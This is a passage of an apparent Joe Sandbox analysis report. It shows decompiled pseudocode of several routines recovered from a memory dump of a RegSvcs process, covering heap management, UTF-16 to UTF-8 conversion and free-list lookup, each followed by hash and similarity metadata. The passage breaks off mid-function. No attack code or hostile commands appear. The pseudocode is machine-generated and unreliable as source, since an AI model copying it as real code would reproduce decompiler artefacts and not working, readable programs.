                                          				_t193 = __ebx;
                                          				_push(0x70);
                                          				_push(0x13cf9c0);
                                          				E0134D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                          				if( *0x13e7b04 == 0) {
                                          					L4:
                                          					goto L5;
                                          				} else {
                                          					_t136 = E0130CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                          					_t236 = 0;
                                          					if(_t136 < 0) {
                                          						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                          					}
                                          					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                          						_t193 =  *( *[fs:0x30] + 0x18);
                                          						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                          						 *(_t237 - 0x68) = _t236;
                                          						 *(_t237 - 0x6c) = _t236;
                                          						_t235 = _t236;
                                          						 *(_t237 - 0x60) = _t236;
                                          						E01312280( *[fs:0x30], 0x13e8550);
                                          						_t139 =  *0x13e7b04; // 0x1
                                          						__eflags = _t139 - 1;
                                          						if(__eflags != 0) {
                                          							_t200 = 0xc;
                                          							_t201 = _t237 - 0x40;
                                          							_t141 = E0132F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                          							 *(_t237 - 0x44) = _t141;
                                          							__eflags = _t141;
                                          							if(_t141 < 0) {
                                          								L50:
                                          								E0130FFB0(_t193, _t235, 0x13e8550);
                                          								L5:
                                          								return E0134D130(_t193, _t235, _t236);
                                          							}
                                          							_push(_t201);
                                          							_t221 = 0x10;
                                          							_t202 =  *(_t237 - 0x40);
                                          							_t145 = E012F1C45( *(_t237 - 0x40), _t221);
                                          							 *(_t237 - 0x44) = _t145;
                                          							__eflags = _t145;
                                          							if(_t145 < 0) {
                                          								goto L50;
                                          							}
                                          							_t146 =  *0x13e7b9c; // 0x0
                                          							_t235 = L01314620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                          							 *(_t237 - 0x60) = _t235;
                                          							__eflags = _t235;
                                          							if(_t235 == 0) {
                                          								_t149 = 0xc0000017;
                                          								 *(_t237 - 0x44) = 0xc0000017;
                                          							} else {
                                          								_t149 =  *(_t237 - 0x44);
                                          							}
                                          							__eflags = _t149;
                                          							if(__eflags >= 0) {
                                          								L8:
                                          								 *(_t237 - 0x64) = _t235;
                                          								_t150 =  *0x13e7b10; // 0x0
                                          								 *(_t237 - 0x4c) = _t150;
                                          								_push(_t237 - 0x74);
                                          								_push(_t237 - 0x39);
                                          								_push(_t237 - 0x58);
                                          								_t193 = E0132A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                          								 *(_t237 - 0x44) = _t193;
                                          								__eflags = _t193;
                                          								if(_t193 < 0) {
                                          									L30:
                                          									E0130FFB0(_t193, _t235, 0x13e8550);
                                          									__eflags = _t235 - _t237 - 0x38;
                                          									if(_t235 != _t237 - 0x38) {
                                          										_t235 =  *(_t237 - 0x48);
                                          										L013177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                          									} else {
                                          										_t235 =  *(_t237 - 0x48);
                                          									}
                                          									__eflags =  *(_t237 - 0x6c);
                                          									if( *(_t237 - 0x6c) != 0) {
                                          										L013177F0(_t235, _t236,  *(_t237 - 0x6c));
                                          									}
                                          									__eflags = _t193;
                                          									if(_t193 >= 0) {
                                          										goto L4;
                                          									} else {
                                          										goto L5;
                                          									}
                                          								}
                                          								_t204 =  *0x13e7b04; // 0x1
                                          								 *(_t235 + 8) = _t204;
                                          								__eflags =  *((char*)(_t237 - 0x39));
                                          								if( *((char*)(_t237 - 0x39)) != 0) {
                                          									 *(_t235 + 4) = 1;
                                          									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                          									_t161 =  *0x13e7b10; // 0x0
                                          									 *(_t237 - 0x4c) = _t161;
                                          								} else {
                                          									 *(_t235 + 4) = _t236;
                                          									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                          								}
                                          								 *((intOrPtr*)(_t237 - 0x54)) = E013337C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                          								_t224 = _t236;
                                          								 *(_t237 - 0x40) = _t236;
                                          								 *(_t237 - 0x50) = _t236;
                                          								while(1) {
                                          									_t163 =  *(_t235 + 8);
                                          									__eflags = _t224 - _t163;
                                          									if(_t224 >= _t163) {
                                          										break;
                                          									}
                                          									_t228 =  *0x13e7b9c; // 0x0
                                          									_t214 = L01314620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                          									 *(_t237 - 0x78) = _t214;
                                          									__eflags = _t214;
                                          									if(_t214 == 0) {
                                          										L52:
                                          										_t193 = 0xc0000017;
                                          										L19:
                                          										 *(_t237 - 0x44) = _t193;
                                          										L20:
                                          										_t206 =  *(_t237 - 0x40);
                                          										__eflags = _t206;
                                          										if(_t206 == 0) {
                                          											L26:
                                          											__eflags = _t193;
                                          											if(_t193 < 0) {
                                          												E013337F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                          												__eflags =  *((char*)(_t237 - 0x39));
                                          												if( *((char*)(_t237 - 0x39)) != 0) {
                                          													 *0x13e7b10 =  *0x13e7b10 - 8;
                                          												}
                                          											} else {
                                          												_t169 =  *(_t237 - 0x68);
                                          												__eflags = _t169;
                                          												if(_t169 != 0) {
                                          													 *0x13e7b04 =  *0x13e7b04 - _t169;
                                          												}
                                          											}
                                          											__eflags = _t193;
                                          											if(_t193 >= 0) {
                                          												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                          											}
                                          											goto L30;
                                          										}
                                          										_t226 = _t206 * 0xc;
                                          										__eflags = _t226;
                                          										_t194 =  *(_t237 - 0x48);
                                          										do {
                                          											 *(_t237 - 0x40) = _t206 - 1;
                                          											_t226 = _t226 - 0xc;
                                          											 *(_t237 - 0x4c) = _t226;
                                          											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                          											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                          												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                          												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                          													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                          													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                          													__eflags =  *((char*)(_t237 - 0x39));
                                          													if( *((char*)(_t237 - 0x39)) == 0) {
                                          														_t171 = _t210;
                                          													} else {
                                          														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                          														L013177F0(_t194, _t236, _t210 - 8);
                                          														_t171 =  *(_t237 - 0x50);
                                          													}
                                          													L48:
                                          													L013177F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                          													L46:
                                          													_t206 =  *(_t237 - 0x40);
                                          													_t226 =  *(_t237 - 0x4c);
                                          													goto L24;
                                          												}
                                          												 *0x13e7b08 =  *0x13e7b08 + 1;
                                          												goto L24;
                                          											}
                                          											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                          											__eflags = _t171;
                                          											if(_t171 != 0) {
                                          												__eflags =  *((char*)(_t237 - 0x39));
                                          												if( *((char*)(_t237 - 0x39)) == 0) {
                                          													goto L48;
                                          												}
                                          												E013357C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                          												goto L46;
                                          											}
                                          											L24:
                                          											__eflags = _t206;
                                          										} while (_t206 != 0);
                                          										_t193 =  *(_t237 - 0x44);
                                          										goto L26;
                                          									}
                                          									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                          									 *(_t237 - 0x7c) = _t232;
                                          									 *(_t232 - 4) = _t214;
                                          									 *(_t237 - 4) = _t236;
                                          									E0133F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                          									_t238 = _t238 + 0xc;
                                          									 *(_t237 - 4) = 0xfffffffe;
                                          									_t215 =  *(_t237 - 0x48);
                                          									__eflags = _t193;
                                          									if(_t193 < 0) {
                                          										L013177F0(_t215, _t236,  *(_t237 - 0x78));
                                          										goto L20;
                                          									}
                                          									__eflags =  *((char*)(_t237 - 0x39));
                                          									if( *((char*)(_t237 - 0x39)) != 0) {
                                          										_t233 = E0132A44B( *(_t237 - 0x4c));
                                          										 *(_t237 - 0x50) = _t233;
                                          										__eflags = _t233;
                                          										if(_t233 == 0) {
                                          											L013177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                          											goto L52;
                                          										}
                                          										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                          										L17:
                                          										_t234 =  *(_t237 - 0x40);
                                          										_t218 = _t234 * 0xc;
                                          										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                          										 *(_t218 + _t235 + 0x10) = _t236;
                                          										_t224 = _t234 + 1;
                                          										 *(_t237 - 0x40) = _t224;
                                          										 *(_t237 - 0x50) = _t224;
                                          										_t193 =  *(_t237 - 0x44);
                                          										continue;
                                          									}
                                          									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                          									goto L17;
                                          								}
                                          								 *_t235 = _t236;
                                          								_t165 = 0x10 + _t163 * 0xc;
                                          								__eflags = _t165;
                                          								_push(_t165);
                                          								_push(_t235);
                                          								_push(0x23);
                                          								_push(0xffffffff);
                                          								_t193 = E013396C0();
                                          								goto L19;
                                          							} else {
                                          								goto L50;
                                          							}
                                          						}
                                          						_t235 = _t237 - 0x38;
                                          						 *(_t237 - 0x60) = _t235;
                                          						goto L8;
                                          					}
                                          					goto L4;
                                          				}
                                          			}


































                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b136f276147dca4052a4d5e0c6e8f6742ef9755f88afeb456b514120ae77f9eb
                                          • Instruction ID: aa0b76ace2cb6f37f0a3abc08e453df127451ac46140ca6cc5766e6c265517b9
                                          • Opcode Fuzzy Hash: b136f276147dca4052a4d5e0c6e8f6742ef9755f88afeb456b514120ae77f9eb
                                          • Instruction Fuzzy Hash: 3DB17B70E0030ADFDF26DFA8C990AADBBF9BF48708F144169E515AB785D770A841CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0132EBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
                                          				signed short* _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				unsigned int _v20;
                                          				intOrPtr _t42;
                                          				unsigned int _t43;
                                          				unsigned int _t50;
                                          				signed char _t56;
                                          				signed char _t60;
                                          				signed int _t63;
                                          				signed int _t73;
                                          				signed int _t77;
                                          				signed int _t80;
                                          				unsigned int _t82;
                                          				signed int _t87;
                                          				signed int _t91;
                                          				signed short _t96;
                                          				signed short* _t98;
                                          				signed char _t100;
                                          				signed int* _t102;
                                          				signed short* _t105;
                                          				intOrPtr _t106;
                                          				signed int _t108;
                                          				signed int* _t110;
                                          				void* _t113;
                                          				signed int _t115;
                                          				signed short* _t117;
                                          				signed int _t118;
                                          
                                          				_t98 = _a16;
                                          				_t87 = 0;
                                          				_v16 = 0;
                                          				if(_t98 == 0) {
                                          					return 0xc00000f2;
                                          				}
                                          				_t110 = _a4;
                                          				if(_t110 == 0) {
                                          					if(_a12 == 0) {
                                          						_t42 = 0xc000000d;
                                          					} else {
                                          						_t42 = E0132ED1A(_t98, _a20, _a12);
                                          					}
                                          					L19:
                                          					return _t42;
                                          				}
                                          				_t43 = _a20;
                                          				if((_t43 & 0x00000001) != 0) {
                                          					_t42 = 0xc00000f3;
                                          					goto L19;
                                          				} else {
                                          					_t102 = _t110;
                                          					_t105 =  &(_t98[_t43 >> 1]);
                                          					_v8 = _t105;
                                          					_v12 = _a8 + _t110;
                                          					L4:
                                          					while(1) {
                                          						L4:
                                          						while(1) {
                                          							L4:
                                          							if(_t98 >= _t105) {
                                          								if(_t87 == 0) {
                                          									L17:
                                          									_t106 = _v16;
                                          									L18:
                                          									_t42 = _t106;
                                          									 *_a12 = _t102 - _a4;
                                          									goto L19;
                                          								}
                                          								L8:
                                          								_t13 = _t87 - 0xd800; // -55295
                                          								if(_t13 <= 0x7ff) {
                                          									_v16 = 0x107;
                                          									_t87 = 0xfffd;
                                          								}
                                          								_t113 = 1;
                                          								if(_t87 > 0x7f) {
                                          									if(_t87 > 0x7ff) {
                                          										if(_t87 > 0xffff) {
                                          											_t113 = 2;
                                          										}
                                          										_t113 = _t113 + 1;
                                          									}
                                          									_t113 = _t113 + 1;
                                          								}
                                          								if(_t102 > _v12 - _t113) {
                                          									_t106 = 0xc0000023;
                                          									goto L18;
                                          								} else {
                                          									if(_t87 > 0x7f) {
                                          										_t50 = _t87;
                                          										if(_t87 > 0x7ff) {
                                          											if(_t87 > 0xffff) {
                                          												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
                                          												_t102 =  &(_t102[0]);
                                          												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
                                          											} else {
                                          												_t56 = _t50 >> 0x0000000c | 0x000000e0;
                                          											}
                                          											 *_t102 = _t56;
                                          											_t102 =  &(_t102[0]);
                                          											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
                                          										} else {
                                          											_t60 = _t50 >> 0x00000006 | 0x000000c0;
                                          										}
                                          										 *_t102 = _t60;
                                          										_t102 =  &(_t102[0]);
                                          										_t87 = _t87 & 0x0000003f | 0x00000080;
                                          									}
                                          									 *_t102 = _t87;
                                          									_t102 =  &(_t102[0]);
                                          									_t63 = _t105 - _t98 >> 1;
                                          									_t115 = _v12 - _t102;
                                          									if(_t63 > 0xd) {
                                          										if(_t115 < _t63) {
                                          											_t63 = _t115;
                                          										}
                                          										_t22 = _t63 - 5; // -5
                                          										_t117 =  &(_t98[_t22]);
                                          										if(_t98 < _t117) {
                                          											do {
                                          												_t91 =  *_t98 & 0x0000ffff;
                                          												_t100 =  &(_t98[1]);
                                          												if(_t91 > 0x7f) {
                                          													L58:
                                          													if(_t91 > 0x7ff) {
                                          														_t38 = _t91 - 0xd800; // -55296
                                          														if(_t38 <= 0x7ff) {
                                          															if(_t91 > 0xdbff) {
                                          																_t98 = _t100 - 2;
                                          																break;
                                          															}
                                          															_t108 =  *_t100 & 0x0000ffff;
                                          															_t98 = _t100 + 2;
                                          															_t39 = _t108 - 0xdc00; // -54273
                                          															if(_t39 > 0x3ff) {
                                          																_t98 = _t98 - 4;
                                          																break;
                                          															}
                                          															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
                                          															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
                                          															_t102 =  &(_t102[0]);
                                          															_t73 = _t91 & 0x0003f000 | 0x00080000;
                                          															L65:
                                          															_t117 = _t117 - 2;
                                          															 *_t102 = _t73 >> 0xc;
                                          															_t102 =  &(_t102[0]);
                                          															_t77 = _t91 & 0x00000fc0 | 0x00002000;
                                          															L66:
                                          															 *_t102 = _t77 >> 6;
                                          															_t117 = _t117 - 2;
                                          															_t102[0] = _t91 & 0x0000003f | 0x00000080;
                                          															_t102 =  &(_t102[0]);
                                          															goto L30;
                                          														}
                                          														_t73 = _t91 | 0x000e0000;
                                          														goto L65;
                                          													}
                                          													_t77 = _t91 | 0x00003000;
                                          													goto L66;
                                          												}
                                          												 *_t102 = _t91;
                                          												_t102 =  &(_t102[0]);
                                          												if((_t100 & 0x00000002) != 0) {
                                          													_t91 =  *_t100 & 0x0000ffff;
                                          													_t100 = _t100 + 2;
                                          													if(_t91 > 0x7f) {
                                          														goto L58;
                                          													}
                                          													 *_t102 = _t91;
                                          													_t102 =  &(_t102[0]);
                                          												}
                                          												if(_t100 >= _t117) {
                                          													break;
                                          												} else {
                                          													goto L28;
                                          												}
                                          												while(1) {
                                          													L28:
                                          													_t80 =  *(_t100 + 4);
                                          													_t96 =  *_t100;
                                          													_v20 = _t80;
                                          													if(((_t80 | _t96) & 0xff80ff80) != 0) {
                                          														break;
                                          													}
                                          													_t82 = _v20;
                                          													_t100 = _t100 + 8;
                                          													 *_t102 = _t96;
                                          													_t102[0] = _t82;
                                          													_t102[0] = _t96 >> 0x10;
                                          													_t102[0] = _t82 >> 0x10;
                                          													_t102 =  &(_t102[1]);
                                          													if(_t100 < _t117) {
                                          														continue;
                                          													}
                                          													goto L30;
                                          												}
                                          												_t91 = _t96 & 0x0000ffff;
                                          												_t100 = _t100 + 2;
                                          												if(_t91 > 0x7f) {
                                          													goto L58;
                                          												}
                                          												 *_t102 = _t91;
                                          												_t102 =  &(_t102[0]);
                                          												L30:
                                          											} while (_t98 < _t117);
                                          											_t105 = _v8;
                                          										}
                                          										goto L32;
                                          									} else {
                                          										if(_t115 < _t63) {
                                          											L32:
                                          											_t87 = 0;
                                          											continue;
                                          										}
                                          										while(_t98 < _t105) {
                                          											_t87 =  *_t98 & 0x0000ffff;
                                          											_t98 =  &(_t98[1]);
                                          											if(_t87 > 0x7f) {
                                          												L7:
                                          												_t12 = _t87 - 0xd800; // -55290
                                          												if(_t12 <= 0x3ff) {
                                          													goto L4;
                                          												}
                                          												goto L8;
                                          											}
                                          											 *_t102 = _t87;
                                          											_t102 =  &(_t102[0]);
                                          										}
                                          										goto L17;
                                          									}
                                          								}
                                          							}
                                          							_t118 =  *_t98 & 0x0000ffff;
                                          							if(_t87 != 0) {
                                          								_t36 = _t118 - 0xdc00; // -56314
                                          								if(_t36 <= 0x3ff) {
                                          									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
                                          									_t98 =  &(_t98[1]);
                                          								}
                                          								goto L8;
                                          							}
                                          							_t87 = _t118;
                                          							_t98 =  &(_t98[1]);
                                          							goto L7;
                                          						}
                                          					}
                                          				}
                                          			}
































                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                          • Instruction ID: 993a864ee0de7818f07d0ed5fdd29488080b1f0c941a83461c66724a76223f0b
                                          • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                          • Instruction Fuzzy Hash: 1E813B31A042798FEF255EACC4C227DFB58EF5231CB2C857AD942CB749C2259846DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E0131AB40(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				intOrPtr _v8;
                                          				signed short _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr* _v24;
                                          				intOrPtr* _v28;
                                          				intOrPtr _t69;
                                          				intOrPtr* _t70;
                                          				intOrPtr _t71;
                                          				intOrPtr _t73;
                                          				void* _t74;
                                          				signed int _t77;
                                          				signed int _t79;
                                          				signed int _t82;
                                          				signed int _t88;
                                          				unsigned int _t97;
                                          				unsigned int _t99;
                                          				unsigned int _t105;
                                          				unsigned int _t107;
                                          				intOrPtr* _t111;
                                          				unsigned int _t118;
                                          				void* _t123;
                                          				intOrPtr _t127;
                                          				signed int _t128;
                                          				void* _t131;
                                          				signed char _t136;
                                          				signed char _t141;
                                          				signed char _t146;
                                          				signed int _t151;
                                          				signed int _t153;
                                          				unsigned int _t155;
                                          				intOrPtr _t158;
                                          				void* _t164;
                                          				signed short _t167;
                                          				void* _t171;
                                          				void* _t173;
                                          				intOrPtr* _t175;
                                          				intOrPtr* _t178;
                                          				signed short _t180;
                                          				signed short _t182;
                                          
                                          				_t149 = __ecx;
                                          				_t111 =  *((intOrPtr*)(__edx + 0x18));
                                          				_v24 = __edx;
                                          				_t69 =  *((intOrPtr*)(_t111 + 4));
                                          				_t158 = _a12;
                                          				_v8 = __ecx;
                                          				_v16 = _a8 -  *((intOrPtr*)(__edx + 0x14));
                                          				_v28 = _t111;
                                          				if(_t111 == _t69) {
                                          					L7:
                                          					_t70 = _t111;
                                          					goto L8;
                                          				} else {
                                          					_t127 = _a4;
                                          					if(_t127 == 0) {
                                          						_t171 = _t158 -  *((intOrPtr*)(_t69 + 0x14));
                                          					} else {
                                          						_t182 =  *(_t69 - 8);
                                          						_v20 = _t69 + 0xfffffff8;
                                          						if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
                                          							_t105 =  *(__ecx + 0x50) ^ _t182;
                                          							_v12 = _t105;
                                          							_t107 = _v12;
                                          							_t146 = _t105 >> 0x00000010 ^ _t105 >> 0x00000008 ^ _t107;
                                          							if(_t107 >> 0x18 != _t146) {
                                          								_push(_t146);
                                          								E013BA80D(__ecx, _v20, 0, 0);
                                          								_t149 = _v8;
                                          							}
                                          							_t182 = _v12;
                                          							_t127 = _a4;
                                          						}
                                          						_t171 = _t158 - (_t182 & 0x0000ffff);
                                          					}
                                          					if(_t171 <= 0) {
                                          						_t71 =  *_t111;
                                          						if(_t127 == 0) {
                                          							_t173 = _t158 -  *((intOrPtr*)(_t71 + 0x14));
                                          						} else {
                                          							_t180 =  *(_t71 - 8);
                                          							_v20 = _t71 + 0xfffffff8;
                                          							if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                          								_t97 =  *(_t149 + 0x50) ^ _t180;
                                          								_v12 = _t97;
                                          								_t99 = _v12;
                                          								_t141 = _t97 >> 0x00000010 ^ _t97 >> 0x00000008 ^ _t99;
                                          								if(_t99 >> 0x18 != _t141) {
                                          									_push(_t141);
                                          									E013BA80D(_t149, _v20, 0, 0);
                                          									_t149 = _v8;
                                          								}
                                          								_t180 = _v12;
                                          								_t127 = _a4;
                                          							}
                                          							_t173 = _t158 - (_t180 & 0x0000ffff);
                                          						}
                                          						if(_t173 <= 0) {
                                          							return  *_t111;
                                          						} else {
                                          							_t175 = _v24;
                                          							if( *_t175 != 0 || _a8 !=  *((intOrPtr*)(_t175 + 4)) - 1) {
                                          								_t128 = _v16;
                                          								_t73 =  *((intOrPtr*)(_t175 + 0x1c));
                                          								_t151 = _t128 >> 5;
                                          								_t164 = ( *((intOrPtr*)(_t175 + 4)) -  *((intOrPtr*)(_t175 + 0x14)) >> 5) - 1;
                                          								_t118 =  !((1 << (_t128 & 0x0000001f)) - 1) &  *(_t73 + _t151 * 4);
                                          								_t74 = _t73 + _t151 * 4;
                                          								if(1 == 0) {
                                          									while(_t151 <= _t164) {
                                          										_t118 =  *(_t74 + 4);
                                          										_t74 = _t74 + 4;
                                          										_t151 = _t151 + 1;
                                          										if(_t118 == 0) {
                                          											continue;
                                          										} else {
                                          											goto L28;
                                          										}
                                          										goto L51;
                                          									}
                                          									if(_t118 != 0) {
                                          										goto L28;
                                          									} else {
                                          										goto L40;
                                          									}
                                          								} else {
                                          									L28:
                                          									if(_t118 == 0) {
                                          										_t77 = _t118 >> 0x00000010 & 0x000000ff;
                                          										if(_t77 != 0) {
                                          											_t79 = ( *(_t77 + 0x12d84d0) & 0x000000ff) + 0x10;
                                          										} else {
                                          											_t57 = (_t118 >> 0x18) + 0x12d84d0; // 0x10008
                                          											_t79 = ( *_t57 & 0x000000ff) + 0x18;
                                          										}
                                          									} else {
                                          										_t82 = _t118 & 0x000000ff;
                                          										if(_t118 == 0) {
                                          											_t79 = ( *((_t118 >> 0x00000008 & 0x000000ff) + 0x12d84d0) & 0x000000ff) + 8;
                                          										} else {
                                          											_t79 =  *(_t82 + 0x12d84d0) & 0x000000ff;
                                          										}
                                          									}
                                          									_t153 = (_t151 << 5) + _t79;
                                          									if( *((intOrPtr*)(_t175 + 8)) != 0) {
                                          										_t153 = _t153 + _t153;
                                          									}
                                          									_t70 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t153 * 4));
                                          									L8:
                                          									return _t70;
                                          								}
                                          							} else {
                                          								_t88 = _v16;
                                          								if( *((intOrPtr*)(_t175 + 8)) != 0) {
                                          									_t88 = _t88 + _t88;
                                          								}
                                          								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t88 * 4));
                                          								if(_t111 == _t178) {
                                          									L40:
                                          									return 0;
                                          								} else {
                                          									do {
                                          										if(_t127 == 0) {
                                          											_t131 = _t158 -  *((intOrPtr*)(_t178 + 0x14));
                                          										} else {
                                          											_t167 =  *(_t178 - 8);
                                          											_t123 = _t178 - 8;
                                          											if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                          												_t155 =  *(_t149 + 0x50) ^ _t167;
                                          												_t167 = _t155;
                                          												_t136 = _t155 >> 0x00000010 ^ _t155 >> 0x00000008 ^ _t155;
                                          												_t149 = _v8;
                                          												if(_t155 >> 0x18 != _t136) {
                                          													_push(_t136);
                                          													E013BA80D(_t149, _t123, 0, 0);
                                          													_t149 = _v8;
                                          												}
                                          											}
                                          											_t111 = _v28;
                                          											_t158 = _a12;
                                          											_t131 = _t158 - (_t167 & 0x0000ffff);
                                          										}
                                          										if(_t131 <= 0) {
                                          											return _t178;
                                          										} else {
                                          											goto L24;
                                          										}
                                          										goto L51;
                                          										L24:
                                          										_t178 =  *_t178;
                                          										_t127 = _a4;
                                          									} while (_t111 != _t178);
                                          									goto L40;
                                          								}
                                          							}
                                          						}
                                          					} else {
                                          						goto L7;
                                          					}
                                          				}
                                          				L51:
                                          			}











































                                          0x0131ac8e
                                          0x0131ac90
                                          0x0131ac93
                                          0x00000000
                                          0x0131ac46
                                          0x0131ac40
                                          0x0131ac1c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131abb9
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6b0919870c4c8c0c033f8922f9ebf60fcfd96924c6e5a304aef5944c4ff96bea
                                          • Instruction ID: 7f285d1456922a439441002d034c7f2fd952fd5845d321b47b23cf30a4505ce2
                                          • Opcode Fuzzy Hash: 6b0919870c4c8c0c033f8922f9ebf60fcfd96924c6e5a304aef5944c4ff96bea
                                          • Instruction Fuzzy Hash: 8081F431A016998BDF28CE5DC89477ABBF1FB8031AF598159D941EF789D630ED04CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 98%
                                          			E013C25DD(signed int __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				intOrPtr _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed int _t74;
                                          				signed int _t77;
                                          				signed int _t80;
                                          				signed int _t82;
                                          				signed int _t102;
                                          				signed int _t117;
                                          				signed int _t121;
                                          				signed int _t122;
                                          				signed int _t123;
                                          				signed int _t132;
                                          				signed int _t133;
                                          				signed int _t134;
                                          				intOrPtr _t135;
                                          				void* _t154;
                                          				signed int _t160;
                                          				signed int _t168;
                                          				unsigned int _t175;
                                          				signed int _t185;
                                          				signed int _t187;
                                          				signed int _t189;
                                          				signed int _t190;
                                          				signed int _t191;
                                          				signed int _t193;
                                          				signed int _t194;
                                          				unsigned int _t200;
                                          				unsigned int _t201;
                                          				signed char _t202;
                                          				signed int _t204;
                                          				signed int _t210;
                                          				intOrPtr _t211;
                                          				signed int _t212;
                                          
                                          				_t133 = _a4;
                                          				_v24 = __edx;
                                          				_v16 = __ecx;
                                          				E013C2E3F(__ecx, __edx, __eflags, _t133);
                                          				_t204 = _a8;
                                          				_t187 = 0x10;
                                          				_t210 = (( *_t133 ^  *0x13e6110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
                                          				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
                                          					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
                                          					_t132 = _t185 << 3;
                                          					if(_t132 >= _t187) {
                                          						if(__eflags != 0) {
                                          							__eflags = _t132 - 0x20;
                                          							if(_t132 < 0x20) {
                                          								_t204 = _t204 + 1;
                                          								_t210 = _t210 - 1;
